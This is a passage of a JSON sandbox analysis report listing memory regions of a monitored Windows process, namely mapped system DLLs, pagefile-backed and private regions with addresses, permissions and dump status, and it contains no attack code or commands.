null, "id": "region_482", "name": "pagefile_0x0000000000530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5439488, "timestamp": "00:00:20.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_483", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:00:20.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_484", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:00:20.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_485", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:00:20.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000486-addr_0x00000000011c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 18612224, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_486", "name": "private_0x00000000011c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18612224, "timestamp": "00:00:20.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19787775, "entry_point": 0, "filename": null, "id": "region_487", "name": "pagefile_0x0000000001200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18874368, "timestamp": "00:00:20.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_488", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:20.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_489", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:00:20.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_490", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:20.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1957625856, "type": "region", "version": 1 }, "end_va": 1957720063, "entry_point": 1957625856, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_491", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1957625856, "timestamp": "00:00:20.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_492", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:20.959", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1581055, "entry_point": 0, "filename": null, "id": "region_493", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:20.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_494", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:20.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_495", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:20.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19791872, "type": "region", "version": 1 }, "end_va": 22736895, "entry_point": 19791872, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_496", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19791872, "timestamp": "00:00:20.982", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000497-addr_0x0000000001670000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 23527424, "type": "region", "version": 1 }, "end_va": 23789567, "entry_point": 0, "filename": null, "id": "region_497", "name": "private_0x0000000001670000", "norm_filename": null, "region_type": "private_memory", "start_va": 23527424, "timestamp": "00:00:20.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_498", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:00:20.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1953452031, "entry_point": 1952517534, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_499", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:00:20.983", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000500-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_500", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:20.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_501", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:20.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_502", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:00:20.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_503", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:21.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 155648, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2383871, "entry_point": 2228224, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_504", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 2228224, "timestamp": "00:00:21.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_505", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:00:21.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_506", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:00:21.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_507", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:21.016", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000508-addr_0x00000000015d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 22872064, "type": "region", "version": 1 }, "end_va": 23134207, "entry_point": 0, "filename": null, "id": "region_508", "name": "private_0x00000000015d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 22872064, "timestamp": "00:00:21.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 23789568, "type": "region", "version": 1 }, "end_va": 27930623, "entry_point": 0, "filename": null, "id": "region_509", "name": "pagefile_0x00000000016b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 23789568, "timestamp": "00:00:21.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1901133824, "type": "region", "version": 1 }, "end_va": 1901445119, "entry_point": 1901133824, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_510", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1901133824, "timestamp": "00:00:21.079", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000511-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_511", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:21.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1863450624, "type": "region", "version": 1 }, "end_va": 1863639039, "entry_point": 1863450624, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_512", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1863450624, "timestamp": "00:00:21.096", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000532-addr_0x0000000001ab0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 29032447, "entry_point": 0, "filename": null, "id": "region_532", "name": "private_0x0000000001ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27983872, "timestamp": "00:00:21.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1863385088, "type": "region", "version": 1 }, "end_va": 1863421951, "entry_point": 1863390526, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_533", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1863385088, "timestamp": "00:00:21.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2047999, "entry_point": 2031616, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_534", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2031616, "timestamp": "00:00:21.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 18022400, "type": "region", "version": 1 }, "end_va": 18219007, "entry_point": 18022400, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_535", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 18022400, "timestamp": "00:00:21.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 18219008, "type": "region", "version": 1 }, "end_va": 18235391, "entry_point": 18219008, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_536", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 18219008, "timestamp": "00:00:21.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 29032448, "type": "region", "version": 1 }, "end_va": 29450239, "entry_point": 29032448, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_537", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 29032448, "timestamp": "00:00:21.452", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1880096768, "type": "region", "version": 1 }, "end_va": 1880555519, "entry_point": 1880104805, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_538", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1880096768, "timestamp": "00:00:21.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965723647, "entry_point": 1965626137, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_539", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:00:21.572", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000540-addr_0x0000000001db0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:00:21.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1880555520, "type": "region", "version": 1 }, "end_va": 1880600575, "entry_point": 1880560128, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_541", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1880555520, "timestamp": "00:00:21.601", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000542-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_542", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:21.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1947795456, "type": "region", "version": 1 }, "end_va": 1947836415, "entry_point": 1947815200, "filename": "\\Windows\\System32\\slc.dll", "id": "region_543", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1947795456, "timestamp": "00:00:21.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_544", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:00:21.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_545", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:00:21.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1674510336, "type": "region", "version": 1 }, "end_va": 1675010047, "entry_point": 1674518344, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_546", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1674510336, "timestamp": "00:00:21.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 18284544, "type": "region", "version": 1 }, "end_va": 18288639, "entry_point": 0, "filename": null, "id": "region_547", "name": "pagefile_0x0000000001170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18284544, "timestamp": "00:00:21.814", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000548-addr_0x0000000001630000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 23265280, "type": "region", "version": 1 }, "end_va": 23527423, "entry_point": 0, "filename": null, "id": "region_548", "name": "private_0x0000000001630000", "norm_filename": null, "region_type": "private_memory", "start_va": 23265280, "timestamp": "00:00:21.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1665925120, "type": "region", "version": 1 }, "end_va": 1671868415, "entry_point": 1665925120, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_549", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1665925120, "timestamp": "00:00:21.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1913454592, "type": "region", "version": 1 }, "end_va": 1914089471, "entry_point": 1913454592, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_550", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1913454592, "timestamp": "00:00:21.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18350080, "type": "region", "version": 1 }, "end_va": 18354175, "entry_point": 0, "filename": null, "id": "region_551", "name": "pagefile_0x0000000001180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18350080, "timestamp": "00:00:22.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18415616, "type": "region", "version": 1 }, "end_va": 18419711, "entry_point": 0, "filename": null, "id": "region_552", "name": "pagefile_0x0000000001190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18415616, "timestamp": "00:00:22.310", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000553-addr_0x00000000011a0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18481152, "type": "region", "version": 1 }, "end_va": 18546687, "entry_point": 0, "filename": null, "id": "region_553", "name": "private_0x00000000011a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18481152, "timestamp": "00:00:22.312", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000554-addr_0x00000000011b0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18546688, "type": "region", "version": 1 }, "end_va": 18612223, "entry_point": 0, "filename": null, "id": "region_554", "name": "private_0x00000000011b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18546688, "timestamp": "00:00:22.312", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000555-addr_0x00000000015b0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", 